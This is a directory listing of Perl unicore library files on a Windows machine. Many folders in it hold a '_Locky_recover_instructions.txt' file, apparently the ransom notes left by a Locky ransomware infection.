c:\Perl\perl\lib\unicore\lib\Blk\Supplem6.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Suppleme.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\SylotiNa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Syriac.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Tagalog.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Tagbanwa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Tags.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\TaiLe.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\TaiTham.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\TaiViet.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\TaiXuanJ.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Tamil.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Telugu.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Thaana.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Thai.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Tibetan.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Tifinagh.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ugaritic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\UnifiedC.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Vai.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Variati2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Variatio.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\VedicExt.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Vertical.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\YijingHe.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\YiRadica.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\YiSyllab.pl<br />
c:\Perl\perl\lib\unicore\lib\Cased\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Cased\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Cased\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\10.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Ccc\103.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\107.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\11.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\118.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\12.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\122.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\129.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\13.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\130.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\132.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\14.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\15.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\16.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\17.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\18.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\19.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\20.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\21.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\22.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\23.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\24.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\25.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\26.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\27.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\28.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\29.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\30.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\31.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\32.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\33.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\34.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\35.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\36.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\84.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\91.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\A.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\AL.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\AR.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\ATA.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\ATAR.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\ATB.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\ATBL.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\B.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\BL.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\BR.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\DA.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\DB.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\IS.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\KV.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\L.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\NK.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\NR.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\OV.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\R.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\VR.pl<br />
c:\Perl\perl\lib\unicore\lib\CE\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CE\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CE\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CI\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CI\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CI\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CompEx\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CompEx\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CompEx\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CWCF\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CWCF\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CWCF\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CWCM\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CWCM\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CWCM\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CWKCF\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CWKCF\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CWKCF\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CWL\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CWL\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CWL\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CWT\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CWT\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CWT\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CWU\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CWU\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CWU\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Dash\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Dash\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Dash\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Dep\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Dep\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Dep\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\DI\N.pl<br />
c:\Perl\perl\lib\unicore\lib\DI\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\DI\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Dia\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Dia\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Dia\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Com.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Dt\Enc.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Fin.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Font.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Fra.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Init.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Iso.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Med.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Nar.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Nb.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\NonCanon.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\None.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Sml.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Sqr.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Sub.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Sup.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Vert.pl<br />
c:\Perl\perl\lib\unicore\lib\Ea\A.pl<br />
c:\Perl\perl\lib\unicore\lib\Ea\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Ea\F.pl<br />
c:\Perl\perl\lib\unicore\lib\Ea\H.pl<br />
c:\Perl\perl\lib\unicore\lib\Ea\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Ea\Na.pl<br />
c:\Perl\perl\lib\unicore\lib\Ea\W.pl<br />
c:\Perl\perl\lib\unicore\lib\Ext\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Ext\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Ext\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\C.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Gc\Cc.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Cf.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Cn.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Co.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Cs.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\L.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\LC.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Ll.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Lm.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Lo.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Lt.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Lu.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\M.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Mc.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Me.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Mn.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Nl.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\No.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\P.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Pd.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Pe.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Pf.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Pi.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Po.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Ps.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\S.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Sc.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Sk.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Sm.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\So.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Z.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Zl.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Zp.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Zs.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\CN.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\GCB\CR.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\EX.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\L.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\LF.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\LV.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\LVT.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\PP.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\SM.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\T.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\V.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\XX.pl<br />
c:\Perl\perl\lib\unicore\lib\GrBase\N.pl<br />
c:\Perl\perl\lib\unicore\lib\GrBase\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\GrBase\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\GrExt\N.pl<br />
c:\Perl\perl\lib\unicore\lib\GrExt\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\GrExt\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Hex\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Hex\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Hex\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Hst\NA.pl<br />
c:\Perl\perl\lib\unicore\lib\Hst\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Hyphen\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Hyphen\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Hyphen\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\IDC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\IDC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\IDC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Ideo\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Ideo\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Ideo\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\IDS\N.pl<br />
c:\Perl\perl\lib\unicore\lib\IDS\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\IDS\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\IDSB\N.pl<br />
c:\Perl\perl\lib\unicore\lib\IDSB\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\IDSB\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\IDST\N.pl<br />
c:\Perl\perl\lib\unicore\lib\IDST\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\IDST\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\In\2_0.pl<br />
c:\Perl\perl\lib\unicore\lib\In\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\In\2_1.pl<br />
c:\Perl\perl\lib\unicore\lib\In\3_0.pl<br />
c:\Perl\perl\lib\unicore\lib\In\3_1.pl<br />
c:\Perl\perl\lib\unicore\lib\In\3_2.pl<br />
c:\Perl\perl\lib\unicore\lib\In\4_0.pl<br />
c:\Perl\perl\lib\unicore\lib\In\4_1.pl<br />
c:\Perl\perl\lib\unicore\lib\In\5_0.pl<br />
c:\Perl\perl\lib\unicore\lib\In\5_1.pl<br />
c:\Perl\perl\lib\unicore\lib\In\5_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Ain.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Jg\Alaph.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Alef.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Beh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Beth.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Burushas.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Dal.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\DalathRi.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\E.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\FarsiYeh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Fe.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Feh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\FinalSem.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Gaf.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Gamal.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Hah.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\HamzaOnH.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\He.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Heh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\HehGoal.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Heth.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Kaf.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Kaph.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Khaph.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\KnottedH.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Lam.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Lamadh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Meem.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Mim.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\NoJoinin.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Noon.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Nun.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Nya.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Pe.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Qaf.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Qaph.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Reh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Reversed.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Sad.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Sadhe.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Seen.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Semkath.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Shin.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\SwashKaf.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\SyriacWa.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Tah.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Taw.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\TehMarbu.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Teth.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Waw.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Yeh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\YehBarre.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\YehWithT.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Yudh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\YudhHe.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Zain.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Zhain.pl<br />
c:\Perl\perl\lib\unicore\lib\JoinC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\JoinC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\JoinC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Jt\C.pl<br />
c:\Perl\perl\lib\unicore\lib\Jt\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Jt\D.pl<br />
c:\Perl\perl\lib\unicore\lib\Jt\R.pl<br />
c:\Perl\perl\lib\unicore\lib\Jt\T.pl<br />
c:\Perl\perl\lib\unicore\lib\Jt\U.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\AI.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Lb\AL.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\B2.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\BA.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\BB.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\BK.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\CB.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\CL.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\CM.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\CP.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\EX.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\GL.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\HY.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\ID.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\IN.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\IS.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\NL.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\NS.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\NU.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\OP.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\PO.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\PR.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\QU.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\SA.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\SG.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\SP.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\SY.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\WJ.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\XX.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\ZW.pl<br />
c:\Perl\perl\lib\unicore\lib\LOE\N.pl<br />
c:\Perl\perl\lib\unicore\lib\LOE\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Lower\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Lower\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Lower\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Math\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Math\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Math\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\NChar\N.pl<br />
c:\Perl\perl\lib\unicore\lib\NChar\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\NChar\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\NFCQC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\NFCQC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\NFDQC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\NFDQC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\NFDQC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\NFKCQC\M.pl<br />
c:\Perl\perl\lib\unicore\lib\NFKCQC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\NFKCQC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\NFKCQC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\NFKDQC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\NFKDQC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Nt\De.pl<br />
c:\Perl\perl\lib\unicore\lib\Nt\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Nt\Di.pl<br />
c:\Perl\perl\lib\unicore\lib\Nt\Nu.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\0.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Nv\1.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\10.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\100.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\10000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\100000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\10000000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\10000002.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\11.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\11_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\12.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\13.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\13_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\14.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\15.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\15_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\16.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\17.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\17_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\18.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\19.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_10.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_16.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_3.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_4.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_5.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_6.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_7.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_8.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_9.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\20.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\200.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\2000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\20000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\21.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\22.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\23.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\24.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\25.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\26.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\27.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\28.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\29.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\2_3.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\2_5.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\30.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\300.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\30000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\31.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\32.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\33.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\34.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\35.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\36.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\37.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\38.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\39.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3_16.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3_4.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3_5.pl<br />
